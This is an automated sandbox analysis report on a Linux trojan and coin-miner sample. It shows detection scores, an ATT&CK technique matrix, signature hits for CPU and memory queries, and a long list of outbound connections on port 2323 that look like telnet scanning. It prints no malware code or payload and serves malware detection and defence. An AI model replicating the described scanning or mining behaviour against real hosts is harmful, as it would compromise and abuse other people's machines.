Loading ...

Play interactive tourEdit tour

Analysis Report agJPi4fCrP

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:1019092
Start date:13.12.2019
Start time:11:26:28
Joe Sandbox Product:Cloud
Overall analysis duration:0h 5m 27s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:agJPi4fCrP
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:CentOS Linux 7.5 x64 (Kernel 3.10.0-862, Firefox 52.8.0, Document Viewer 3.22.1, LibreOffice 5.3.6.1, OpenJDK 1.8.0_171)
Detection:MAL
Classification:mal64.troj.evad.mine.lin@0/2@6/0
Warnings:
Show All
  • Report size exceeded maximum capacity and may have missing network information.

Detection

StrategyScoreRangeReportingWhitelistedDetection
Threshold640 - 100Report FP / FNfalsemalicious

Classification

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsLocal Job Scheduling1Local Job Scheduling1Port MonitorsScripting1Credential Dumping1Process Discovery1Remote File Copy1Data from Local SystemData CompressedUncommonly Used Port11Jamming or Denial of Service11
Replication Through Removable MediaScripting1Systemd Service1Accessibility FeaturesObfuscated Files or Information1Network SniffingSecurity Software Discovery1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumRemote File Copy1
Drive-by CompromiseWindows Management InstrumentationAccessibility FeaturesPath InterceptionRootkitInput CaptureSystem Information Discovery3Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Non-Application Layer Protocol2
Exploit Public-Facing ApplicationScheduled TaskSystem FirmwareDLL Search Order HijackingObfuscated Files or InformationCredentials in FilesSystem Network Configuration DiscoveryLogon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol12

Signature Overview

Click to jump to signature section


Bitcoin Miner:

barindex
Searches for CPU information (likely indicative for DDoS capability)Show sources
Source: /bin/sh (PID: 3191)Executable: /bin/grep -> grep -c ^processor /proc/cpuinfo
Executes the "free" command used for querying memory usage (likely indicative for DDoS or mining capabilities)Show sources
Source: /bin/sh (PID: 3205)Free executable: /bin/free -> free
Reads CPU information from /proc indicative of miner or evasive malwareShow sources
Source: /bin/grep (PID: 3191)Reads CPU info from proc file: /proc/cpuinfo
Reads CPU information from /sys indicative of miner or evasive malwareShow sources
Source: /bin/free (PID: 3205)Reads CPU info from /sys: /sys/devices/system/cpu/online

Networking:

barindex
Uses known network protocols on non-standard portsShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58610
Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58616
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 106.243.152.204:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 45.247.28.204:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 205.100.153.245:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 98.179.130.153:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 130.154.3.180:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 32.56.239.68:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 39.237.7.127:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 196.60.190.167:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 60.162.145.239:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 159.246.132.132:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 162.162.215.6:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 20.33.59.53:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 188.13.68.161:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 193.106.17.177:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 194.239.90.143:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 24.68.252.24:2323
Source: global trafficTCP traffic: 192.168.1.101:48972 -> 173.232.146.101:40000
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 133.84.26.209:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 71.60.190.47:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 162.227.119.37:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 185.179.67.70:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 94.149.159.13:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 68.9.164.137:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 143.248.39.178:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 187.181.189.200:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 102.114.227.177:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 200.233.216.231:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 155.3.36.20:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 222.128.2.70:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 25.60.13.226:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 54.168.34.236:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 190.40.93.27:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 152.109.8.183:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 188.10.193.219:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 202.186.214.41:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 13.68.59.234:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 177.109.235.242:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 41.252.224.234:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 158.149.74.84:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 183.43.149.205:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 86.45.223.17:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 34.232.126.91:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 173.164.32.11:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 53.131.63.181:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 25.76.210.126:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 99.81.66.100:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 140.101.78.31:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 195.250.148.186:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 188.234.14.114:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 183.95.232.78:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 18.32.37.112:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 9.28.119.112:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 69.45.110.134:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 57.46.7.222:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 74.52.38.118:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 62.248.18.50:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 121.70.188.96:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 47.226.42.151:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 196.245.228.81:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 99.239.207.220:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 148.255.206.27:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 193.43.60.44:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 94.68.222.140:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 44.210.80.236:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 207.75.80.217:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 142.6.109.217:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 75.198.133.68:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 14.64.228.134:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 19.181.108.98:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 108.240.191.35:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 221.137.227.70:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 138.215.48.152:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 17.137.205.40:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 24.223.42.77:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 63.131.99.132:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 152.178.212.102:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 59.50.221.43:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 66.28.17.186:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 71.168.61.186:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 80.141.66.205:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 146.138.244.97:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 72.171.33.190:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 209.162.77.25:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 203.154.154.35:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 40.67.150.252:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 143.152.14.180:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 59.247.185.43:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 49.23.122.233:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 202.129.29.174:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 211.30.9.93:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 105.141.128.224:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 2.47.225.163:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 199.109.126.142:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 133.178.123.184:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 2.144.133.94:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 110.212.192.55:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 60.160.233.200:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 156.114.26.166:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 48.236.219.127:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 4.219.240.23:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 50.161.235.154:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 12.144.80.103:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 83.206.4.200:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 119.120.122.147:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 38.139.208.197:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 181.181.40.49:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 91.61.6.114:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 205.159.237.24:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 102.222.77.182:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 40.168.196.78:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 164.113.182.241:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 78.160.93.0:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 81.100.64.242:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 126.4.11.168:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 187.247.88.220:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 78.112.205.64:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 51.219.54.254:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 200.160.218.54:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 203.162.41.140:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 72.252.77.85:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 97.196.104.76:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 144.140.216.183:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 96.147.50.189:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 223.134.95.120:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 53.2.90.92:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 84.80.107.127:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 42.68.244.33:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 197.245.57.248:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 120.33.221.43:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 13.103.231.92:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 168.159.187.168:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 41.97.180.173:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 132.157.113.68:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 162.150.87.117:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 219.54.93.129:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 94.233.215.239:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 45.126.240.9:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 156.59.77.37:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 198.36.197.226:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 95.238.1.189:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 130.104.75.80:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 185.71.191.85:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 168.208.22.229:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 112.231.64.126:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 102.111.81.16:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 44.84.20.0:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 218.133.8.25:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 111.6.68.207:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 37.20.15.167:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 51.133.92.115:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 173.46.3.251:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 94.10.53.212:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 110.114.218.238:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 135.187.6.98:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 200.67.143.79:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 220.140.176.208:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 59.151.175.157:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 31.80.159.238:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 121.50.250.22:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 108.25.40.164:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 62.202.140.161:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 81.15.69.21:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 206.255.211.109:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 120.97.233.64:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 216.61.45.11:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 153.176.95.33:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 139.111.157.13:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 106.46.119.100:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 154.42.132.86:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 67.218.27.131:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 59.109.21.235:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 223.148.160.93:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 50.126.215.88:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 182.31.245.237:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 19.240.203.99:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 176.25.197.48:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 169.70.161.15:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 202.35.204.50:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 221.143.213.160:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 218.237.52.237:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 211.146.229.118:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 69.109.247.211:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 136.0.58.26:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 14.80.61.70:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 158.145.242.165:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 219.229.206.66:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 67.130.124.63:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 45.225.60.5:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 103.195.201.91:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 88.245.60.20:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 153.192.162.57:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 38.203.92.179:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 148.165.167.230:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 140.180.190.213:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 41.56.53.248:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 177.79.95.185:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 100.184.112.245:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 112.5.72.48:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 196.249.229.53:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 48.43.206.197:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 81.210.251.188:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 168.131.233.14:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 160.199.100.149:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 178.44.92.52:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 178.137.12.118:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 54.43.175.126:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 18.254.24.175:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 169.13.195.8:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 156.92.193.138:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 175.158.50.123:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 141.133.200.180:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 178.171.162.82:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 159.54.216.194:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 161.223.205.3:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 101.200.7.83:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 37.63.254.190:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 106.62.207.176:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 167.84.164.200:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 65.67.103.6:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 218.3.94.196:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 18.244.13.103:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 9.73.54.47:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 187.6.18.250:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 164.119.197.194:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 74.39.94.169:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 74.111.13.128:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 103.167.71.64:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 131.212.32.181:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 213.244.253.229:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 183.235.70.210:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 34.111.44.78:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 44.10.249.20:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 17.109.199.20:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 57.88.251.4:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 219.111.155.153:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 157.223.66.131:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 177.84.2.205:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 124.67.22.145:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 177.96.74.211:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 45.219.177.236:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 72.180.244.135:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 91.232.249.49:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 143.243.36.199:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 96.183.243.237:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 203.41.28.9:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 205.43.123.152:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 85.120.115.48:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 113.178.119.247:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 154.112.96.113:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 47.217.83.216:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 188.211.46.99:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 36.222.242.37:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 142.100.156.97:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 209.192.214.131:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 78.38.214.168:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 176.220.155.153:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 97.193.51.60:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 124.74.233.39:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 142.31.54.56:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 69.42.233.79:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 81.235.243.2:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 62.153.115.163:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 91.90.249.9:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 186.67.6.243:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 83.157.165.118:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 126.228.107.43:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 73.15.91.75:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 188.66.103.26:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 195.130.104.72:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 39.88.216.129:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 70.146.5.189:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 196.9.232.203:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 101.146.97.79:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 84.160.198.117:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 78.118.47.23:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 54.70.192.234:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 112.207.57.20:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 66.34.147.112:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 110.148.205.245:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 152.1.131.241:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 222.146.182.59:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 167.176.166.197:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 75.61.94.101:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 93.18.69.57:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 78.138.186.50:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 87.27.120.240:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 78.139.127.3:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 40.59.15.227:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 58.190.254.176:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 48.94.231.31:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 49.132.136.10:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 219.185.105.97:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 184.7.95.223:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 86.123.242.127:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 123.123.210.245:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 85.135.99.59:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 117.174.187.152:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 1.1.119.140:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 61.46.3.90:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 19.183.110.105:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 125.6.8.224:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 70.217.106.152:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 1.169.240.245:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 169.151.204.148:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 160.82.217.64:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 187.178.59.68:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 125.192.49.61:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 126.190.127.7:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 116.126.209.61:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 178.91.45.140:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 27.67.112.248:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 93.7.156.39:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 51.4.117.47:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 114.97.63.141:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 168.217.111.205:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 140.74.199.227:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 139.188.183.247:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 88.118.214.40:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 168.189.117.40:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 119.181.171.75:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 57.24.234.193:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 118.160.215.165:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 154.218.66.171:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 98.9.226.77:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 54.22.166.157:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 186.66.238.240:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 13.170.16.39:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 1.160.229.48:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 121.87.69.172:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 150.18.97.202:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 100.180.252.45:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 217.241.111.237:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 65.102.13.62:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 105.206.138.222:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 12.116.28.250:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 70.114.112.245:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 46.107.135.133:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 191.246.43.26:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 102.51.97.142:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 8.238.9.178:2323
